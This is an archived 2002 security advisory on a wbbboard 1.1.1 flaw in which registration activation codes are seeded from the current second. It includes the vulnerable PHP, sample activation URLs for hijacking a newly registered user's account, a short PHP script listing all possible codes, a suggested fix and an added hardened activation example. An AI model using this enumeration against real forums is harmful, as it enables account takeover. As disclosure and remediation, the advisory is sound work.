wbbboard 1.1.1 registration _new_users_vulnerability_

From: SeazoN (seazonat_private)
Date: Sun May 26 2002 - 07:11:17 PDT


    wbbboard 1.1.1 registration _new_users_vulnerability_
    --------------------------------------------------
    wbbboard  : I can't find any contact info in credits :(
                I sent a message to wbbhacks.de and mywbb.de
                (support forums), they didn't reply for 3
                days (I think enough)
    
    Affected program         : wbbboard 1.1.1
    Vendor                   : http://www.woltlab.de/
    Vulnerability-Class      : security bug
    OS specific              : No
    Remote                   : Yes
    Problem-Skill            : High for users waiting for registration activation
                               None for activated users
    
    SUMMARY
    
    wbboard is a PHP & MySQL based forum.
    
    Here is some code (register.php)
    ---------------------------
    $datum = date("s");
    mt_srand($datum);
    $z = mt_rand();
    $db_zugriff->query("INSERT INTO bb".$n."_user_table
    (username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
    VALUES
    ('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");
    ---------------------------
    After that the script sends mail to userat_private with the URL for activation.
    Here is some code from action.php
    ---------------------------
    if($action=="activation") {
            $result = activat($userid,$code);
            if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
            if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
            if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
            if(!$result) {
                    $user_id = $userid;
                    eval ("\$output = \"".gettemplate("note21")."\";");
                    $user_password = getUserPW($userid);
                    session_register("user_id");
                    session_register("user_password");
                    setcookie("user_id", "$user_id", time()+(3600*24*365));
                    setcookie("user_password", "$user_password", time()+(3600*24*365));
            }
            $ride = "main.php?styleid=$styleid$session";
    }
    
    IMPACT
    
    You can steal a NEW user account with its password.
    
    EXPLOIT
    
    Register in the forum and you will receive a message like this:
    To continue registration
    http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
    Now you know how many users are on the forum and can hijack users with
     userid=346 (for example)
     
    HEART OF EXPLOIT
    ----------------------
    | $datum = date("s");|
    | mt_srand($datum);  |  this code results in only 30 original integer words :)
    | $z = mt_rand();    |  I think it is not so hard to bruteforce
    ----------------------
    http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
    http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
    ....
    http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007
    
    You can get all variations with this script
    <?php
    for($i=0; $i<60; $i++)
    {
    mt_srand($i);
    echo mt_rand()."<BR>";
    //   ^^^^^^^^^ here you are :)
    }
    ?>
    
     SOLUTION:
       use simple rand() or really unpredictable md5(uniqid(rand(),1))
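
A hardened form of the activation-code handling discussed in the post, as an added example that is not part of the original message or of the WBB code base: the code is drawn from PHP's random_bytes() (PHP 7 or later) rather than the post's suggested md5(uniqid(rand(),1)), and is checked with expiry, a failure cap and single use. The function names, row layout, 24-hour lifetime and five-attempt cap are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not WBB code. Names, row layout and limits are assumptions.
const ACTIVATION_TTL = 86400;  // assumed lifetime of a code: 24 hours
const MAX_FAILURES   = 5;      // assumed cap on wrong guesses per account

// 128 bits from the OS CSPRNG instead of mt_rand() seeded with date("s").
// Mail 'token' to the user; store only the other fields in the user row.
function issue_activation(int $now): array
{
    $token = bin2hex(random_bytes(16));
    return ['token' => $token, 'hash' => hash('sha256', $token),
            'issued_at' => $now, 'failures' => 0];
}

// Validate a presented code against the stored row and consume it on success.
// In a real schema the final step is one atomic UPDATE ... WHERE hash = ?.
function check_activation(array &$row, string $presented, int $now): bool
{
    if ($row['hash'] === null || $row['failures'] >= MAX_FAILURES) {
        return false;                       // already used, or locked out
    }
    if ($now - $row['issued_at'] > ACTIVATION_TTL) {
        return false;                       // expired: user must request a new code
    }
    // hash_equals() compares in constant time
    if (!hash_equals($row['hash'], hash('sha256', $presented))) {
        $row['failures']++;
        return false;
    }
    $row['hash'] = null;                    // single use
    return true;
}

// Constructed demo: one pending registration and three activation attempts.
$now    = time();
$issued = issue_activation($now);
$row    = ['hash' => $issued['hash'], 'issued_at' => $now, 'failures' => 0];

var_dump(check_activation($row, '1563109322', $now));          // guessed code
var_dump(check_activation($row, $issued['token'], $now + 60)); // code from the mail
var_dump(check_activation($row, $issued['token'], $now + 90)); // replay of a used code
```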
    



    This archive was generated by hypermail 2b30 : Mon May 27 2002 - 14:21:29 PDT